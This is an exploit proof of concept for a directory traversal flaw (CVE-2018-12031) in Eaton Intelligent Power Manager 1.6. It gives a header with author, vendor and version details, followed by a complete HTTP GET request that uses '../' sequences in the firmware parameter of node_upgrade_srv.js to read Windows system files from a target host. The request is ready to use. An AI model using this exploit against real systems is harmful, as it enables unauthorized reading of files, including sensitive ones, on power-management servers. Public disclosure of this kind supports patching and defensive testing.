# Exploit Title: Eaton Intelligent Power Manager 1.6 - Directory Traversal # Date: 2018-09-29 # Exploit Author: Emre ÖVÜNÇ # Vendor Homepage: https://powerquality.eaton.com/ # Software Link: https://powerquality.eaton.com/Support/Software-Drivers/default.asp?cx=-999 # Version: v1.6 # Tested on: Windows # CVE-2018-12031 # https://nvd.nist.gov/vuln/detail/CVE-2018-12031 # https://github.com/EmreOvunc/Eaton-Intelligent-Power-Manager-Local-File-Inclusion # PoC To exploit vulnerability, someone could use 'https://[HOST]/server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../' request to get some informations from the target. GET /server/node_upgrade_srv.js?action=downloadFirmware&firmware=/../../../../../../../../../../windows/System32/drivers/etc/host HTTP/1.1 Host: [TARGET] User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.13; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate DNT: 1 Connection: close Upgrade-Insecure-Requests: 1